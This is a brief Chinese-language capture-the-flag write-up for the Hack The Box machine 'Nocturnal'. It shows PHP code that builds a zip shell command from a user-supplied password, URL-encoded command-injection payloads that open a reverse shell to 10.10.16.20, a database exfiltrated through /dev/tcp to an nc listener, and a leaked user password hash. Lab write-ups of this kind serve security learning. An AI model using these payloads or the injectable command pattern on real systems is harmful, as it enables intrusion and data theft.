htb-nocturnal

(Updated: )
,

htb-nocturnal 解题记录

$command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " . > " . $logFile . " 2>&1 &";

$command = “zip -x ‘./backups/*’ -r -P
bash -c ‘id’
“ . $backupFile . “ . > “ . $logFile . “ 2>&1 &”;

%0abash%09-c%09%22bash+-i+%3e%26+%2fdev%2ftcp%2f10.10.16.20%2f4443+0%3e%261%22%0a

alt text

bash -i >& /dev/tcp/10.10.16.20/4443 0>&1
bash+-i+%3e%26+%2fdev%2ftcp%2f10.10.16.20%2f4443+0%3e%261

bash -i >& /dev/tcp/10.10.16.20/4443 0>&1

bash -i >& /dev/tcp/10.10.16.20/4443 0>&1

ls

password=%0abash%09-c%09%22bash%09-i%09%3e%26%09%2fdev%2ftcp%2f10.10.16.20%2f4443%090%3e%261%22%0a&backup=】

nc -lvp 8888 > received_database.db

cat nocturnal_database.db > /dev/tcp/10.10.10.10/8888

alt text

为啥选择这个用户 可以cat /etc/passwd | grep bash 这个就是用户

4|tobias|55c82b1ccd55ab219b3b109b07d5061d

通过爆破或者查询

alt text

alt text

EXP

存在密码复用的情况